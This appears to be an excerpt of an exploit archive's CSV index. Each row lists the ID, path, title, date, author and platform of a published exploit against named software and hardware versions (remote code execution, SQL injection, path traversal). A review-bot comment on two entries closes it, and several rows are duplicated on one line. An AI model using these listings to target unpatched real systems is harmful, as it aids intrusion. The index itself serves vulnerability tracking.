44039,exploits/linux/webapps/44039.txt,"Dell EMC Isilon OneFS - Multiple Vulnerabilities",2018-02-14,"Core Security",webapps,linux, 44039,exploits/linux/webapps/44039.txt,"Dell EMC Isilon OneFS - Multiple Vulnerabilities",2018-02-14,"Core Security",webapps,linux,
44041,exploits/multiple/webapps/44041.txt,"Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution",2017-03-17,SecuriTeam,webapps,multiple,
44043,exploits/hardware/webapps/44043.md,"iBall WRA150N - Multiple Vulnerabilities",2018-01-29,SecuriTeam,webapps,hardware,
44044,exploits/php/webapps/44044.md,"GitStack - Unauthenticated Remote Code Execution",2018-01-15,SecuriTeam,webapps,php,
44045,exploits/php/webapps/44045.md,"Monstra CMS - Remote Code Execution",2017-12-06,SecuriTeam,webapps,php,
44050,exploits/php/webapps/44050.md,"Ametys CMS 4.0.2 - Unauthenticated Password Reset",2017-11-07,SecuriTeam,webapps,php,
44051,exploits/linux/webapps/44051.md,"DblTek - Multiple Vulnerabilities",2017-11-21,SecuriTeam,webapps,linux,
44054,exploits/linux/webapps/44054.md,"FiberHome - Directory Traversal",2017-10-13,SecuriTeam,webapps,linux,
44056,exploits/php/webapps/44056.md,"PHP Melody 2.7.3 - Multiple Vulnerabilities",2017-10-09,SecuriTeam,webapps,php,
44058,exploits/hardware/webapps/44058.md,"Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure",2017-08-03,SecuriTeam,webapps,hardware,
44059,exploits/php/webapps/44059.md,"Horde Groupware 5.2.21 - Unauthorized File Download",2017-08-03,SecuriTeam,webapps,php,
44060,exploits/php/webapps/44060.md,"QNAP HelpDesk < 1.1.12 - SQL Injection",2017-10-09,SecuriTeam,webapps,php,
44061,exploits/hardware/webapps/44061.md,"Hanbanggaoke IP Camera - Arbitrary Password Change",2017-09-11,SecuriTeam,webapps,hardware,
44062,exploits/hardware/webapps/44062.md,"McAfee LiveSafe 16.0.3 - Man In The Middle Registry Modification Leading to Remote Command Execution",2017-09-07,SecuriTeam,webapps,hardware,
44065,exploits/hardware/webapps/44065.md,"Sophos XG Firewall 16.05.4 MR-4 - Path Traversal",2017-06-19,SecuriTeam,webapps,hardware,
44070,exploits/hardware/webapps/44070.md,"Cisco DPC3928 Router - Arbitrary File Disclosure",2017-05-10,SecuriTeam,webapps,hardware,
44071,exploits/windows/webapps/44071.md,"IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities",2017-06-08,SecuriTeam,webapps,windows,
44072,exploits/hardware/webapps/44072.md,"Geneko Routers - Unauthenticated Path Traversal",2017-07-16,SecuriTeam,webapps,hardware,
44074,exploits/hardware/webapps/44074.md,"Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution",2017-12-06,SecuriTeam,webapps,hardware,
41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80
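Review bot: Entry 44062 ("McAfee LiveSafe 16.0.3 - Man In The Middle Registry Modification Leading to Remote Command Execution") is filed as webapps/hardware, but a registry modification on a desktop security product is neither a web application nor a hardware target; "windows" (and probably type "remote") fits the description better. Entry 44041 is the one SecuriTeam row in this commit using a .txt extension while every other SecuriTeam row uses .md; please confirm the file name matches what was committed.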